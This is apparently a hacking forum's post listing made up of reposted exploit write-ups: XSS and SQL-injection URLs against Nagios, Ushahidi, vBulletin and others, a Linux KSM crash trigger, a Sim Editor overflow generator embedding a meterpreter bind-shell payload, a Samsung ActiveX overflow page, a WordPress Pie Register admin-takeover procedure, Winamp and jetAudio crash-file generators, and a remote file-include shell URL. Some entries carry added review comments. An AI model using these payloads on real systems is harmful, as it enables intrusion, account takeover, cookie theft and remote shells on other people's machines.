
HireHackking


Everything posted by HireHackking

  1. source: https://www.securityfocus.com/bid/48087/info Nagios is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Nagios 3.2.3 is vulnerable; other versions may also be affected. http://www.example.com/nagios/cgi-bin/config.cgi?type=command&expand=<script>alert(String.fromCharCode(88,83,83))</script> http://www.example.com/nagios/cgi-bin/config.cgi?type=command&expand=<body onload=alert(666)>
  /* source: https://www.securityfocus.com/bid/48101/info The Linux kernel is prone to a local denial-of-service vulnerability. Attackers can exploit this issue to trigger a kernel crash, which may result in a denial-of-service condition. */

/*
 * Review notes: this trigger makes exactly three calls -- a page-aligned
 * allocation, madvise(MADV_MERGEABLE) to offer that page to KSM (kernel
 * samepage merging), and a write through a null pointer.  The null write is
 * an ordinary user-space fault (SIGSEGV) on an unaffected kernel; the
 * advisory above says that on affected kernels the combination ends in a
 * kernel crash.  Nothing here is network-reachable: it needs local code
 * execution, so the exposure is local DoS only.  The code is kept as found;
 * the defects noted inline are not fixed.
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>

/* One page.  This is a macro around a call, re-evaluated at each use. */
#define BUFSIZE getpagesize()

int main(int argc, char **argv)
{
    void *ptr;

    /* NOTE(review): posix_memalign() returns 0 on success and a positive
     * error number on failure -- it neither returns -1 nor sets errno -- so
     * this `< 0` test can never fire and perror() would not report the
     * right cause anyway.  The matching check is `!= 0`. */
    if (posix_memalign(&ptr, getpagesize(), BUFSIZE) < 0) {
        perror("posix_memalign");
        exit(1);
    }

    /* Offer the page to KSM as a merge candidate.  madvise() does follow
     * the -1/errno convention, so this check is correct.  MADV_MERGEABLE is
     * Linux-specific; a kernel built without KSM support rejects it. */
    if (madvise(ptr, BUFSIZE, MADV_MERGEABLE) < 0) {
        perror("madvise");
        exit(1);
    }

    /* Deliberate null-pointer write: undefined behaviour that faults in
     * user space.  The page is never freed and argc/argv are unused; the
     * process is expected to die on this line. */
    *(char *)NULL = 0;
    return 0;
}
  3. source: https://www.securityfocus.com/bid/48100/info Ushahidi is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. Ushahidi 2.0.1 is vulnerable; prior versions may also be affected. http://www.example.com/index.php/admin/dashboard/?range=1[SQLi]
  #include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Size of the two calloc'd staging buffers in main(); far larger than the
 * 810 and 32 bytes actually written into them. */
#define SIZE 65536

/*
 * Title: Sim Editor v6.6 Stack Based Buffer Overflow
 * Version: 6.6
 * Tested on: Windows XP sp2 en, Windows 8 64-bit
 * Date: 16-01-2015
 * Author: Osanda Malith Jayathissa
 * E-Mail: osanda[cat]unseen.is
 * Website: OsandaMalith.wordpress.com
 * CVE: CVE-2015-1171
 *
 * Review notes: this program never contacts a target; it only writes a
 * crafted "exploit.sms" into the current directory (see main()).  Everything
 * it writes is ASCII hex text -- "41" x 405, "B3804200", "90" x 16, then one
 * of the hex strings below -- so the artefact is a text file, presumably in
 * whatever hex-encoded layout the .sms format uses (not confirmed here).
 * For detection the file content is the useful indicator; for the second
 * payload, a new listener on TCP/4444 on the affected host is the runtime
 * one.  The code is kept as found; the defects noted inline are not fixed.
 */

/* Payload 1 as hex text.  The menu labels it "MS Paint"; no generator
 * command is recorded for it, so nothing more is asserted about it here. */
const char shell1[] =
"ba516a43ddd9e9d97424f45e33c9b1"
"3231561503561583eefce2a496ab54"
"46672c07cf821d15abc70ca9b88abc"
"42ec3e36263830ff8d1e7f00209ed3"
"c222622e17855be16ac49c1c849475"
"6a3709f22e8428d424b45251fa41e9"
"582bf96612d3712082e25632feadd3"
"81752c32d8761e7ab749ae77c98e09"
"68bce46915c73f13c142ddb382f505"
"454663ce4923e7884db224a36a3fcb"
"63fb7be8a7a7d891fe0d8eaee0ea6f"
"0b6b187b2d36777abf4d3e7cbf4d11"
"158ec6fe620f0dbb9d450fea3500da"
"ae5bb331ec6530b38d9128b688deee"
"2be14f9b4b566f8e262bff50d1a58b"
"92";

/* msfpayload windows/meterpreter/bind_tcp EXITFUNC=thread LPORT=4444 R | msfencode -a x86 -t c */
/* Payload 2 as hex text: per the author's note above, an encoded bind-TCP
 * meterpreter stager listening on port 4444 (matches shell_info[1]). */
const char shell2[] =
"bb3ff8edc8dbc6d97424f45f2bc9b1"
"4a83effc315f11035f11e2ca04054e"
"34f5d62fbd10e77dd9515ab2aa3457"
"39feacec4fd6c345e500ed56cb8ca1"
"954d70b8c9ad49731caf8e6eeffd47"
"e44212ecb85e99be2ce77e744cc6d0"
"0317c8d3c02341cc050f1b67fdfb9a"
"a1cc04ad8d823a0100db7ba6fbae77"
"d486a843a65c3d560016e5b2b0fb73"
"30beb0f01ea347d514dfccd8fa6996"
"fede324c9f479f23a098479b04d26a"
"c831b9e23d7342f3290431c1f6bedd"
"697e18198d55dcb570561c9fb6024c"
"b71f2b07479ffe87170f5167c8ef01"
"0f02e07e2f2d2a179e098670e2ad38"
"dd6b4b50cd3dc3cd2f1adc6a4f4970"
"22c7c69ef4e8d7b45644705f2d8645"
"7e3283ee17a5597e55575dab0f97cb"
"5786c06355ff272ca62a3ce532952b"
"0ad215ac5cb815c4389845f14635fa"
"aad2b5ab1f74dd5179b242a9ac42bf"
"7c89c0c90af908";

/* Parallel tables indexed by the menu choice: payload text, display name,
 * and a hint printed after the file has been written. */
const char *shells[] = { shell1, shell2 };
const char *shell_names[] = { "MS Paint", "Bind Shell" };
const char *shell_info[] = { "", "[*] Connect on port 4444\n" };
const size_t SHELLS_COUNT = 2;

/* Print the payload menu and read a choice from stdin.
 * Returns the index typed by the user, or SHELLS_COUNT (an out-of-range
 * sentinel that main() rejects) when scanf() stores nothing.
 * NOTE(review): `i` and `shell_type` are size_t but are passed to "%d" and
 * "%i", which are int conversions -- a format/argument mismatch (undefined
 * behaviour; "%zu" would match).  The scanf() return value is unchecked;
 * only the sentinel initial value keeps a failed read from selecting a
 * payload.  The leading "\b" in the prompt is a literal backspace. */
int menu()
{
    size_t shell_type = SHELLS_COUNT;
    puts("\b[?] Choose an Option: ");
    size_t i;
    for (i = 0; i < SHELLS_COUNT; i++)
        printf("%d. %s\n", i, shell_names[i]);
    scanf("%i", &shell_type);
    return shell_type;
}

/* Print the banner.  NOTE(review): sizeof(banner) includes the terminating
 * NUL, so fwrite() also emits one 0x00 byte.  The ASCII-art spacing is as
 * found in this copy of the source and may have been whitespace-collapsed. */
void banner()
{
    static const char banner[] =
        " _____ _ _____ _ _ _ \n"
        "| __|_|_____ | __|_| |_| |_ ___ ___ \n"
        "|__ | | | | __| . | | _| . | _|\n"
        "|_____|_|_|_|_| |_____|___|_|_| |___|_|\n"
        "\n[~] Sim Editor v6.6 Stack Based Buffer Overflow\n"
        "[~] Author: Osanda Malith Jayathissa\n"
        "[~] E-Mail: osanda[cat]unseen.is\n"
        "[~] Website: OsandaMalith.wordpress.com\n\n";
    fwrite(banner, sizeof(char), sizeof(banner) , stdout);
}

/* Fill dst with `count` repetitions of the NUL-terminated `pattern`, writing
 * at most dst_size bytes.  `count` is rescaled from repetitions to bytes and
 * clamped to dst_size, so the final repetition may be cut short.  An empty
 * pattern writes nothing.
 * NOTE(review): dst is not NUL-terminated here; main() relies on calloc()'s
 * zero fill beyond the written bytes, which only holds while
 * count * strlen(pattern) < dst_size (true for the 810 and 32 bytes used). */
void patternfill(char *dst, char *pattern, size_t count, size_t dst_size)
{
    size_t pattern_len = strlen(pattern);
    count *= pattern_len;
    if (count > dst_size) count = dst_size;
    if (pattern_len > dst_size) pattern_len = dst_size;
    size_t i, pI;
    for (i = 0, pI = 0; i < count ; i++, pI++) {
        if (pI == pattern_len) pI = 0;
        dst[i] = pattern[pI];
    }
}

/* Entry point: show the banner and menu, then write "exploit.sms" as
 * padding + "B3804200" + filler + the selected payload, all as hex text,
 * and print that payload's hint.  Exits with status 1 on an invalid choice,
 * allocation failure or fopen() failure.
 * NOTE(review): `shell_type` is an int compared with the size_t
 * SHELLS_COUNT, so a negative value converts to a large unsigned value and
 * is rejected by the same test.  `nops` is never freed (buff is), the
 * fclose() result is unchecked, and the success message contains a typo
 * ("Successfully to written to"); runtime strings are left untouched. */
int main()
{
    banner();
    int shell_type = menu();
    if (shell_type >= SHELLS_COUNT) {
        printf("[-] Enter a valid input\n");
        exit (1);
    }
    /* calloc() zero-fills, which is what keeps the fputs() calls below
     * bounded after patternfill() (see its note). */
    char *buff = (char*) calloc (SIZE, sizeof(char));
    char *nops = (char*) calloc (SIZE, sizeof(char));
    if (!buff || !nops) exit (1);
    patternfill(buff, "41", 405, SIZE);
    patternfill(nops, "90", 16, SIZE);
    char ret[] = "B3804200";
    const char* filename = "exploit.sms";
    /* Text mode is consistent with the content being ASCII hex. */
    FILE *outfile = fopen(filename, "w");
    if (!outfile) {
        printf("%s\n","Could not open file");
        exit (1);
    }
    fputs(buff, outfile);
    fputs(ret, outfile);
    fputs(nops, outfile);
    fputs(shells[shell_type], outfile);
    printf("%s", shell_info[shell_type]);
    fclose(outfile);
    free(buff);
    printf("[+] Successfully to written to: \"%s\"\n", filename);
    return 0;
}
/*EOF*/
  <html>
<!--
Samsung SmartViewer BackupToAvi Remote Code Execution PoC
PoC developed by Praveen Darshanam
For more details refer
http://darshanams.blogspot.com
http://blog.disects.com/2015/01/samsung-smartviewer-backuptoavi-remote.html
Original Vulnerability Discovered by rgod
Vulnerable: Samsung SmartViewer 3.0
Tested on Windows 7 Ultimate N SP1
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9265

Review notes: this page instantiates the SmartViewer ActiveX control by
CLSID and passes an over-long fourth argument to its BackupToAvi() method.
The string is built only from filler characters ("A", "B", "DD") and a
two-byte value the author says was taken from the vulnerable DLL; it
carries no shellcode, so as written it is a crash demonstration rather than
a working code-execution chain.  For defenders, the CLSID on the <object>
tag below is the value an ActiveX kill-bit or browser control-blocking
policy keys on; the control being scriptable from a web page is the
exposure.  Script kept as found.
-->
<object classid='clsid:208650B1-3CA1-4406-926D-45F2DBB9C299' id='target' ></object>
<script >
// Total length of the string handed to BackupToAvi().
var payload_length = 15000;
// The first three arguments are placeholders; only the fourth is oversized.
var arg1=1;
var arg2=1;
var arg3=1;
//blank strings
var junk = "";
var buf1 = "";
var buf2 = "";
//offset to SE is 156, initial analysis using metasploit cyclic pattern
// NOTE(review): `i` and `j` are assigned without `var`, so they become
// implicit globals (sloppy-mode JavaScript).
for (i=0; i<156; i++) { buf1 += "A"; }
var nseh = "DD";
var seh = "\x87\x10"; //from Vulnerable DLL
junk = buf1 + nseh + seh;
//remaining buffer: pad with "B" up to payload_length
for (j=0; j<(payload_length-junk.length); j++) { buf2 += "B"; }
//final malicious buffer
var fbuff = junk + buf2;
// The call that reaches the native method.
target.BackupToAvi(arg1 ,arg2 ,arg3 ,fbuff);
</script>
</html>
  6. # Exploit Title: Pie Register 2.0.13 Privilege escalation # Date: 16-10-2014 # Software Link: https://wordpress.org/plugins/pie-register/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # CVE: CVE-2014-8802 # Category: webapps 1. Description Anyone can import CSV file. Pie Register will import users from this file. File: pie-register\pie-register.php add_action( 'init', array($this,'pie_main') ); function pie_main() { // I skip unnecessary lines if(isset($_FILES['csvfile']['name'])) { $this->importUsers(); } } http://security.szurek.pl/pie-register-2013-privilege-escalation.html 2. Proof of Concept Create CSV file based on given example: "Username","Display name","E-mail","User Registered","First Name","Last Name","Nickname","Role" "hack","Hacked","hacked@hacked.hacked","2010-10-10 20:00:00","Hacked","Hacked","Hacked","administrator" Import account using: <form method="post" action="http://wordpress-instalation" enctype="multipart/form-data"> Input CSV<input type="file" name="csvfile"> <input type="submit" value="Add user!"> </form> Create another standard account using wp-login.php?action=register. After login go to wp-admin/profile.php and search "uid" in page source. Number after "uid" is our current account id. For example: "uid":"123". We can assume that previously imported admin account has id-1 (or id-x where x is natural number). We can activate this account using: <form method="post" action="http://wordpress-instalation"> <input type="hidden" name="verifyit" value="1"> Account id:<input type="text" name="vusers[]" value=""> <input type="submit" value="Activate user!"> </form> Finally we can reset password using: http://wordpress-instalation/wp-login.php?action=lostpassword 3. Solution: Update to version 2.0.14 https://downloads.wordpress.org/plugin/pie-register.2.0.14.zip
  7. source: https://www.securityfocus.com/bid/48106/info vBulletin vBExperience is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. vBulletin vBExperience 3.0 is vulnerable; other versions may also be affected. http://www.example.com/[path]/xperience.php?sortfield=xr&sortorder="><script>alert(1);</script>
  8. source: https://www.securityfocus.com/bid/48108/info http://www.noticeboardpro.com/notice-board-pro-copyright.html Joomla CCBoard is prone to an SQL-injection vulnerability and an arbitrary-file-upload vulnerability because it fails to sanitize user-supplied data. Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_ccboard&view=postlist&forum=1&topic=2
  9. # Exploit Title : Winamp 5.666 build 3516 'f263.w5s' (Corrupted flv) Crash POC # Product : Winamp 5.666 build 3516 # Date : 12.12.2014 # Exploit Author : ITDefensor Vulnerability Research Team http://itdefensor.ru/ # Software Link : http://winampplugins.co.uk/Winamp/ # Vulnerable version : Winamp 5.666 build 3516 (Latest at the moment) and probably previous versions # Vendor Homepage : http://www.winamp.com/ # Tested on : Winamp 5.666 build 3516 installed on Windows 7 x64 # CVE : unknown at the moment #============================================================================================ # Open created POC file (fault.flv) with Winamp # Details #(7714.ac58): Access violation - code c0000005 (first chance) #First chance exceptions are reported before any exception handling. #This exception may be expected and handled. #f263!GetWinamp5SystemComponent+0x1951: #08572f15 0fb601 movzx eax,byte ptr [ecx] ds:002b:e54d18b6=?? #0:021:x86> u eip #f263!GetWinamp5SystemComponent+0x1951: #08572f15 0fb601 movzx eax,byte ptr [ecx] #08572f18 0fb67901 movzx edi,byte ptr [ecx+1] #08572f1c c1e008 shl eax,8 #08572f1f 0bc7 or eax,edi #08572f21 0fb67902 movzx edi,byte ptr [ecx+2] #08572f25 0fb64903 movzx ecx,byte ptr [ecx+3] #08572f29 c1e008 shl eax,8 #08572f2c 0bc7 or eax,edi #!/usr/bin/python flvheader=("\x46\x4C\x56\x01\xC5\x00\x00\x00\x09\x00\x00\x00\x00") flvscripdatatag1 = 
("\x12\x00\x02\x76\x00\x00\x00\x00\x00\x00\x00\x02\x00\x0A\x6F\x6E\x4D\x65\x74\x61\x44\x61\x74\x61\x08\x00\x00\x00\x1C\x00\x0B\x68\x61\x73\x4D\x65\x74\x61\x64\x61\x74\x61\x01\x01\x00\x08\x68\x61\x73\x56\x69\x64\x65\x6F\x01\x01\x00\x08\x68\x61\x73\x41\x75\x64\x69\x6F\x01\x01\x00\x08\x64\x75\x72\x61\x74\x69\x6F\x6E\x00\x3F\xA7\x8D\x4F\xDF\x3B\x64\x5A\x00\x0D\x6C\x61\x73\x74\x74\x69\x6D\x65\x73\x74\x61\x6D\x70\x00\x3F\xA7\x8D\x4F\xDF\x3B\x64\x5A\x00\x15\x6C\x61\x73\x74\x6B\x65\x79\x66\x72\x61\x6D\x65\x74\x69\x6D\x65\x73\x74\x61\x6D\x70\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x77\x69\x64\x74\x68\x00\x40\x89\x00\x00\x00\x00\x00\x00\x00\x06\x68\x65\x69\x67\x68\x74\x00\x40\x82\xC0\x00\x00\x00\x00\x00\x00\x0D\x76\x69\x64\x65\x6F\x64\x61\x74\x61\x72\x61\x74\x65\x00\x40\xBA\x2F\x4B\x7A\x6F\x4D\xEA\x00\x09\x66\x72\x61\x6D\x65\x72\x61\x74\x65\x00\x40\x35\xBD\x37\xA6\xF4\xDE\x9C\x00\x0D\x61\x75\x64\x69\x6F\x64\x61\x74\x61\x72\x61\x74\x65\x00\x40\x55\xDD\xD3\x7A\x6F\x4D\xEA\x00\x0F\x61\x75\x64\x69\x6F\x73\x61\x6D\x70\x6C\x65\x72\x61\x74\x65\x00\x40\xD5\x88\x80\x00\x00\x00\x00\x00\x0F\x61\x75\x64\x69\x6F\x73\x61\x6D\x70\x6C\x65\x73\x69\x7A\x65\x00\x40\x30\x00\x00\x00\x00\x00\x00\x00\x06\x73\x74\x65\x72\x65\x6F\x01\x00\x00\x08\x66\x69\x6C\x65\x73\x69\x7A\x65\x00\x40\xE3\xE1\x00\x00\x00\x00\x00\x00\x09\x76\x69\x64\x65\x6F\x73\x69\x7A\x65\x00\x40\xE3\x47\x20\x00\x00\x00\x00\x00\x09\x61\x75\x64\x69\x6F\x73\x69\x7A\x65\x00\x40\x80\x78\x00\x00\x00\x00\x00\x00\x08\x64\x61\x74\x61\x73\x69\x7A\x65\x00\x40\x85\x18\x00\x00\x00\x00\x00\x00\x0F\x6D\x65\x74\x61\x64\x61\x74\x61\x63\x72\x65\x61\x74\x6F\x72\x02\x00\x0D\x66\x6C\x76\x6D\x65\x74\x61\x20\x31\x2E\x31\x2E\x32\x00\x0C\x6D\x65\x74\x61\x64\x61\x74\x61\x64\x61\x74\x65\x0B\x42\x74\xAF\x38\x0D\x3D\x00\x00\x00\x00\x00\x0C\x61\x75\x64\x69\x6F\x63\x6F\x64\x65\x63\x69\x64\x00\x3F\xF0\x00\x00\x00\x00\x00\x00\x00\x0C\x76\x69\x64\x65\x6F\x63\x6F\x64\x65\x63\x69\x64\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x0A\x61\x75\x64\x69\x6F\x64\x65\x6C\x61\x
79\x00\x3F\xA7\x8D\x4F\xDF\x3B\x64\x5A\x00\x0C\x63\x61\x6E\x53\x65\x65\x6B\x54\x6F\x45\x6E\x64\x01\x01\x00\x0C\x68\x61\x73\x43\x75\x65\x50\x6F\x69\x6E\x74\x73\x01\x00\x00\x09\x63\x75\x65\x50\x6F\x69\x6E\x74\x73\x0A\x00\x00\x00\x00\x00\x0C\x68\x61\x73\x4B\x65\x79\x66\x72\x61\x6D\x65\x73\x01\x01\x00\x09\x6B\x65\x79\x66\x72\x61\x6D\x65\x73\x03\x00\x05\x74\x69\x6D\x65\x73\x0A\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0D\x66\x69\x6C\x65\x70\x6F\x73\x69\x74\x69\x6F\x6E\x73\x0A\x00\x00\x00\x01\x00\x40\x85\xC0\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x09\x00\x00\x02\x81") flvscripdatatag2 = ("\x12\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x02\x00\x0C\x6F\x6E\x4C\x61\x73\x74\x53\x65\x63\x6F\x6E\x64\x08\x00\x00\x00\x00\x00\x00") flvvideotag = ("\x09\x00\x00\x00\x22\x09\x00\x00\x9E\x00\x00\x00\x00\x00\x00\x00\x12\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x9A\x39") flvaudiotag = 
("\x08\x00\x02\x04\x00\x00\x2E\x00\x00\x00\x00\x1A\xBF\xB7\x12\x40\x01\x00\x30\xC2\x3B\x32\x00\xBA\xFD\x6A\x92\x88\x8C\x03\xA9\x38\x02\x89\xA9\x0B\xBD\xE8\x8C\x80\x23\x04\x2C\xE8\xBB\x30\x99\xA3\x2F\xA8\x02\x28\x11\xC2\x8F\x89\xA7\x19\x28\xB0\x99\x40\x40\xB8\x8F\xC1\x02\x41\x12\x08\xC8\x12\x70\x80\x88\x18\xA4\x61\x12\x08\x29\x11\xC2\x21\x3A\x80\x17\x33\x3B\x1A\xF8\x08\x80\x74\x80\x89\x80\xBA\x48\x96\x0B\xA8\x92\x32\x12\x70\x89\xA0\x8A\x25\x28\x82\x98\x3F\xB0\x01\x08\x89\x2E\x90\x90\x01\xBA\x79\xB9\x99\x47\x19\x01\x09\x9B\xBD\xA7\x20\x8A\x9B\x84\x98\x4A\xB4\x1D\xA9\x02\x50\x14\x1C\x81\x90\x29\x02\xAA\xD9\x9C\x12\xD8\x10\x1A\x37\x9A\x20\xDB\xB8\x1C\x13\x86\x28\x89\x13\x09\x9D\xB0\x01\x2A\xD8\xA2\x5C\xB9\x82\xCE\x12\x36\x0A\x99\x01\x82\x08\x02\x61\x93\x71\x08\xBB\x11\x10\x33\x27\x32\x19\x08\xA2\x11\x8F\x06\x99\x18\x81\xDB\x89\x0B\x93\x00\x19\x09\xF2\x3C\xA8\xD8\x08\x18\x17\x8B\x80\x9A\x3C\xF8\x00\x99\xBF\xA0\x08\x91\x8A\x29\x98\xF9\x40\xC9\x0C\x81\xBC\x90\x19\xA2\x59\xC8\x9A\x18\xE0\x08\x0C\xB2\x1B\x37\x00\x0B\x90\x01\x00\x41\xB8\x79\xB2\x9C\x53\x10\x8B\x50\x92\x39\xA0\x98\x73\x42\x43\xAA\x40\x81\x9A\x34\xA8\x53\x87\x48\xA9\xA8\x8A\x96\x10\x23\x19\x94\x00\x43\x88\x3B\x17\x00\x34\x00\x42\x8B\xC0\x10\x01\x89\x65\x89\x30\x24\xA0\x2F\xB2\x89\x88\x8B\xA4\x1C\x81\x93\x49\x99\xCC\xA0\xB8\x8F\xBA\xC2\x2C\x34\x92\x2D\xA2\x0A\x40\x91\x28\xAF\xC8\x03\x18\x29\xFB\x8A\x98\x22\x85\x2C\xAB\xB8\x89\x8C\xA1\x13\xA8\x4D\x87\x8C\x08\x93\x8A\x31\xC9\x19\x26\x88\x29\x22\xEA\x90\x72\x02\x99\x2A\xA1\x92\x79\x04\xAC\x21\x85\x8A\x20\x00\xA2\x11\x09\x44\xBD\xA8\x88\x1A\xB0\x8C\x91\x13\x29\xDB\x8B\xF8\xA9\x40\x61\xF9\x00\x99\x98\x00\x8C\xD8\x20\xB8\x0A\x11\xFC\x0A\xC9\x88\x09\x93\x3A\x01\x9A\xEA\xC0\x0F\x10\x02\x99\x3C\xC0\x9B\x38\xB7\x0B\x99\x99\xF8\x43\x09\x80\x99\x92\x22\x45\x19\x89\xDB\x02\x28\x10\xD0\x20\x12\xB1\xBD\x05\x10\x79\x05\x89\x10\x81\x0C\xB2\x80\x61\x98\x08\x30\xB6\x19\x44\x98\x3A\x98\x82\x18\x76\x09\x10\x91\xCC\x22\xA1\x3A\x09\x92\x9A\x49\xDB\xC8\x31\x12\xC1\x0D\x0A\x83\x01\x70\x
A6\x8B\x3A\xA3\x9B\x40\x92\x80\x59\xB2\xAC\x8E\x91\xB9\x10\x20\xBF\x80\xA0\x93\x2C\x0B\x86\x0C\xB1\x41\x84\xA0\x00\x00\x02\x0F") pocdata = [flvheader,flvscripdatatag1,flvscripdatatag2,flvvideotag,flvaudiotag] flvfile = "fault.flv" file = open(flvfile,"wb") file.write(''.join(pocdata)) file.close()
  10. # Exploit Title : jetAudio 8.1.3 Basic Use-after-free (Corrupted mp4) Crash POC # Product : jetAudio Basic # Date : 12.12.2014 # Exploit Author : ITDefensor Vulnerability Research Team http://itdefensor.ru/ # Software Link : http://www.jetaudio.com/download/ # Vulnerable version : 8.1.3 (Latest at the moment) and probably previous versions # Vendor Homepage : http://www.jetaudio.com/ # Tested on : jetAudio 8.1.3 Basic installed on Windows 7 x64, Windows Server 2008, Windows 7 x86 # CVE : unknown at the moment #============================================================================================ # Open created POC file (fault.mp4) with jetAudio # Details # (6e74.6e20): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. #JFDSPL!JPluginCreate+0x338f8: #0a1a7588 8b11 mov edx,dword ptr [ecx] ds:002b:050aacf8=???????? #0:000:x86> kb #ChildEBP RetAddr Args to Child #WARNING: Stack unwind information not available. Following frames may be wrong. #0018feec 72512466 00000000 00000000 00000000 JFDSPL!JPluginCreate+0x338f8 #*** ERROR: Symbol file could not be found. 
Defaulted to export symbols for JetAudio.exe - #0018ff00 005961ba 00000000 f9b7337c 00000000 MSVCR90!exit+0x11 #0018ff88 7558338a 7efde000 0018ffd4 771e9f72 JetAudio!CxIOFile::~CxIOFile+0x19414a #0018ff94 771e9f72 7efde000 765bba31 00000000 kernel32!BaseThreadInitThunk+0xe #0018ffd4 771e9f45 00596315 7efde000 00000000 ntdll32!__RtlUserThreadStart+0x70 #0018ffec 00000000 00596315 7efde000 00000000 ntdll32!_RtlUserThreadStart+0x1b #0:000:x86> u 0a1a7588 #JFDSPL!JPluginCreate+0x338f8: #0a1a7588 8b11 mov edx,dword ptr [ecx] #0a1a758a 8b420c mov eax,dword ptr [edx+0Ch] #0a1a758d 6a01 push 1 #0a1a758f 6870ff1d0a push offset JFDSPL!CxIOFile::~CxIOFile+0x303e0 (0a1dff70) #0a1a7594 ffd0 call eax #0a1a7596 6aff push 0FFFFFFFFh #0a1a7598 6a00 push 0 #0a1a759a 8d8e043d0000 lea ecx,[esi+3D04h] #============================================================================================ #!/usr/bin/python pocdata=("\x00\x00\x00\xFA\x66\x74\x79\x70\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x00\x00\x00\x00\x6D\x70\x34\x32\x69\x73\x6F\x6D\x61\x76\x63\x31\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x6D\x70\x34\x32\x00\x00") mp4file = "fault.mp4" file = open(mp4file,"w") 
file.write(pocdata) file.close()
  11. source: https://www.securityfocus.com/bid/48109/info Nakid CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Nakid CMS 1.0.2 is vulnerable; other versions may also be affected. http://www.example.com/cms/assets/addons/kcfinder/browse.php?CKEditorFuncNum=0);alert(0);//
  12. source: https://www.securityfocus.com/bid/48110/info Multiple WordPress WooThemes (Live Wire) are prone to a cross-site scripting vulnerability because they fail to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. http://www.example.com/wp-content/themes/_theme's_name_/includes/test.php?a[]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
  13. source: https://www.securityfocus.com/bid/48113/info PopScript is prone to a remote file-include vulnerability, an SQL-injection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass the authentication control. http://www.example.com/PopScript/index.php?act=inbox&mode=1 [ SQL injection ] http://www.example.com/index.php?mode=[Shell txt]?&password=nassrawi&remember=ON
